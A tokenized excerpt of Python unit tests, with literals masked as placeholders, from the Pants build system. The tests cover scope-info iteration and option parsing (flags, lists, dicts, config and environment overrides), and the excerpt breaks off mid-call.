<EOL> def test_type_mismatch_container ( self ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . 
Varz ( [ <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> ] ) <EOL> def test_type_mismatch_value ( self ) : <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> self . Varz ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : False } ) <EOL> def test_type_mismatch_resolvable ( self ) : <EOL> resolvable_item = CountingResolvable ( '<STR_LIT>' , True ) <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : resolvable_item } ) <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> varz . varz <EOL> def test_single_assignment ( self ) : <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> with self . assertRaises ( MutationError ) : <EOL> varz . varz = { '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import unittest <EOL> from pants . help . scope_info_iterator import ScopeInfoIterator <EOL> from pants . option . arg_splitter import GLOBAL_SCOPE <EOL> from pants . option . global_options import GlobalOptionsRegistrar <EOL> from pants . option . scope import ScopeInfo <EOL> from pants . subsystem . subsystem import Subsystem <EOL> from pants . subsystem . subsystem_client_mixin import SubsystemDependency <EOL> from pants . task . task import Task <EOL> class ScopeInfoIteratorTest ( unittest . TestCase ) : <EOL> def test_iteration ( self ) : <EOL> self . maxDiff = None <EOL> class Subsys1 ( Subsystem ) : <EOL> options_scope = '<STR_LIT>' <EOL> class Subsys2 ( Subsystem ) : <EOL> options_scope = '<STR_LIT>' <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return ( SubsystemDependency ( Subsys1 , '<STR_LIT>' ) , ) <EOL> class Goal1Task2 ( Task ) : <EOL> options_scope = '<STR_LIT>' <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return ( SubsystemDependency ( Subsys1 , '<STR_LIT>' ) , ) <EOL> @ classmethod <EOL> def task_subsystems ( cls ) : <EOL> return tuple ( ) <EOL> infos = [ <EOL> ScopeInfo ( GLOBAL_SCOPE , ScopeInfo . GLOBAL , GlobalOptionsRegistrar ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . SUBSYSTEM , Subsys2 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . SUBSYSTEM , Subsys1 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . INTERMEDIATE ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK , Goal1Task2 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . SUBSYSTEM , Subsys1 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . INTERMEDIATE ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . 
INTERMEDIATE ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ] <EOL> scope_to_infos = dict ( ( x . scope , x ) for x in infos ) <EOL> it = ScopeInfoIterator ( scope_to_infos ) <EOL> actual = list ( it . iterate ( [ GLOBAL_SCOPE , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> expected_scopes = [ <EOL> GLOBAL_SCOPE , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> expected_scope_infos = [ scope_to_infos [ x ] for x in expected_scopes ] <EOL> self . assertEquals ( expected_scope_infos , actual ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import shlex <EOL> import tempfile <EOL> import unittest <EOL> import warnings <EOL> from contextlib import contextmanager <EOL> from textwrap import dedent <EOL> from pants . base . deprecated import CodeRemovedError <EOL> from pants . option . arg_splitter import GLOBAL_SCOPE <EOL> from pants . option . config import Config <EOL> from pants . option . custom_types import file_option , target_option <EOL> from pants . option . errors import ( BooleanOptionNameWithNo , FrozenRegistration , ImplicitValIsNone , <EOL> InvalidKwarg , InvalidMemberType , MemberTypeNotAllowed , <EOL> NoOptionNames , OptionAlreadyRegistered , OptionNameDash , <EOL> OptionNameDoubleDash , ParseError , RecursiveSubsystemOption , <EOL> Shadowing ) <EOL> from pants . option . global_options import GlobalOptionsRegistrar <EOL> from pants . option . option_tracker import OptionTracker <EOL> from pants . option . options import Options <EOL> from pants . option . options_bootstrapper import OptionsBootstrapper <EOL> from pants . option . parser import Parser <EOL> from pants . option . ranked_value import RankedValue <EOL> from pants . option . scope import ScopeInfo <EOL> from pants . util . contextutil import temporary_file , temporary_file_path <EOL> from pants . util . dirutil import safe_mkdtemp <EOL> def task ( scope ) : <EOL> return ScopeInfo ( scope , ScopeInfo . TASK ) <EOL> def intermediate ( scope ) : <EOL> return ScopeInfo ( scope , ScopeInfo . INTERMEDIATE ) <EOL> def subsystem ( scope ) : <EOL> return ScopeInfo ( scope , ScopeInfo . SUBSYSTEM ) <EOL> class OptionsTest ( unittest . 
TestCase ) : <EOL> _known_scope_infos = [ intermediate ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> intermediate ( '<STR_LIT>' ) , <EOL> intermediate ( '<STR_LIT:test>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) ] <EOL> def _register ( self , options ) : <EOL> def register_global ( * args , ** kwargs ) : <EOL> options . register ( GLOBAL_SCOPE , * args , ** kwargs ) <EOL> register_global ( '<STR_LIT>' , '<STR_LIT>' , type = bool , help = '<STR_LIT>' , recursive = True ) <EOL> register_global ( '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT> , recursive = True , fingerprint = True ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = int ) <EOL> register_global ( '<STR_LIT>' , type = list ) <EOL> register_global ( '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = bool , fingerprint = True ) <EOL> register_global ( '<STR_LIT>' , type = bool , implicit_value = False ) <EOL> register_global ( '<STR_LIT>' , type = bool , default = True ) <EOL> register_global ( '<STR_LIT>' , type = bool , default = False ) <EOL> register_global ( '<STR_LIT>' , type = bool , implicit_value = False , default = False ) <EOL> register_global ( '<STR_LIT>' , type = bool , implicit_value = False , default = True ) <EOL> register_global ( '<STR_LIT>' , choices = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) <EOL> register_global ( '<STR_LIT>' , choices = [ <NUM_LIT> , <NUM_LIT> ] , type = list , member_type = int ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = int , default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = dict , default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = dict , <EOL> default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = target_option , default = 
'<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = target_option , <EOL> default = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> register_global ( '<STR_LIT>' , type = file_option , default = None ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = file_option ) <EOL> register_global ( '<STR_LIT>' , default = '<STR_LIT:default>' , implicit_value = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = int , recursive = True ) <EOL> register_global ( '<STR_LIT>' , type = int , recursive = True ) <EOL> register_global ( '<STR_LIT>' , removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = bool , removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = int , recursive = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , <EOL> removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = bool , <EOL> removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , fingerprint = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = int , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = dict , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = list , fromfile = True ) <EOL> options . 
register ( '<STR_LIT>' , '<STR_LIT>' , type = list , member_type = int , fromfile = True ) <EOL> def _create_config ( self , config ) : <EOL> with open ( os . path . join ( safe_mkdtemp ( ) , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fp : <EOL> for section , options in config . items ( ) : <EOL> fp . write ( '<STR_LIT>' . format ( section ) ) <EOL> for key , value in options . items ( ) : <EOL> fp . write ( '<STR_LIT>' . format ( key , value ) ) <EOL> return Config . load ( configpaths = [ fp . name ] ) <EOL> def _parse ( self , args_str , env = None , config = None , bootstrap_option_values = None ) : <EOL> args = shlex . split ( str ( args_str ) ) <EOL> options = Options . create ( env = env or { } , <EOL> config = self . _create_config ( config or { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = args , <EOL> bootstrap_option_values = bootstrap_option_values , <EOL> option_tracker = OptionTracker ( ) ) <EOL> self . _register ( options ) <EOL> return options <EOL> def test_env_type_int ( self ) : <EOL> options = Options . create ( env = { '<STR_LIT>' : "<STR_LIT>" } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = shlex . split ( '<STR_LIT>' ) , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' , type = list , member_type = int ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT> ] , options . for_global_scope ( ) . foo_bar ) <EOL> options = Options . create ( env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = shlex . split ( '<STR_LIT>' ) , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' , type = int ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . foo_bar ) <EOL> def test_arg_scoping ( self ) : <EOL> options = self . 
_parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , options . target_specs ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> with self . assertRaises ( ParseError ) : <EOL> self . _parse ( '<STR_LIT>' ) . for_global_scope ( ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> self . assertEqual ( True , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> self . assertEqual ( False , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> self . assertEqual ( False , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> self . assertEqual ( True , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> self . assertEqual ( True , options . for_scope ( '<STR_LIT:test>' ) . verbose ) <EOL> self . assertEqual ( False , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT:y>' : [ '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> self . assertEqual ( [ <NUM_LIT> , - <NUM_LIT> ] , options . for_global_scope ( ) . y ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { '<STR_LIT>' : { '<STR_LIT:y>' : [ '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> self . assertEqual ( [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:5> , - <NUM_LIT:6> , <NUM_LIT> ] , options . for_global_scope ( ) . y ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ ] , options . for_global_scope ( ) . y ) <EOL> options = self . _parse ( '<STR_LIT>' , env = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , options . for_global_scope ( ) . config_override ) <EOL> options = self . 
_parse ( '<STR_LIT>' , env = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , options . for_global_scope ( ) . config_override ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . assertEqual ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , options . for_global_scope ( ) . listy ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT:c>' : '<STR_LIT:d>' } , options . for_global_scope ( ) . dicty ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ { '<STR_LIT:c>' : '<STR_LIT:d>' } , { '<STR_LIT:e>' : '<STR_LIT:f>' } ] , options . for_global_scope ( ) . dict_listy ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . targety ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . targety ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , options . for_global_scope ( ) . target_listy ) <EOL> with temporary_file_path ( ) as fp : <EOL> options = self . _parse ( '<STR_LIT>' . format ( fp ) ) <EOL> self . assertEqual ( fp , options . for_global_scope ( ) . filey ) <EOL> with temporary_file_path ( ) as fp1 : <EOL> with temporary_file_path ( ) as fp2 : <EOL> options = self . _parse ( '<STR_LIT>' . format ( fp1 , fp2 ) ) <EOL> self . assertEqual ( [ fp1 , fp2 ] , options . for_global_scope ( ) . file_listy ) <EOL> def test_explicit_boolean_values ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . verbose ) <EOL> options = self . 
_parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . verbose ) <EOL> def test_boolean_defaults ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_set_option ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_negate_option ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . 
store_false_def_true_flag ) <EOL> def test_boolean_config_override_true ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } } ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_config_override_false ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } } ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_invalid_value ( self ) : <EOL> with self . assertRaises ( Parser . BooleanConversionError ) : <EOL> self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:11> , <EOL> } } ) . for_global_scope ( ) <EOL> with self . assertRaises ( Parser . BooleanConversionError ) : <EOL> self . 
_parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> } } ) . for_global_scope ( ) <EOL> def test_list_option ( self ) : <EOL> def check ( expected , args_str , env = None , config = None ) : <EOL> options = self . _parse ( args_str = args_str , env = env , config = config ) <EOL> self . assertEqual ( expected , options . for_global_scope ( ) . listy ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:4> , <NUM_LIT:5> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_dict_list_option ( self ) : <EOL> def check ( expected , args_str , env = None , config = None ) : <EOL> options = self . _parse ( args_str = args_str , env = env , config = config ) <EOL> self . assertEqual ( expected , options . for_global_scope ( ) . 
dict_listy ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } ] , '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> 
} , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_target_list_option ( self ) : <EOL> def check ( expected , args_str , env = None , config = None ) : <EOL> options = self . _parse ( args_str = args_str , env = env , config = config ) <EOL> self . assertEqual ( expected , options . for_global_scope ( ) . target_listy ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_defaults ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . 
num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT:test>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> env = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> options = self . _parse ( '<STR_LIT>' , env = env , config = config 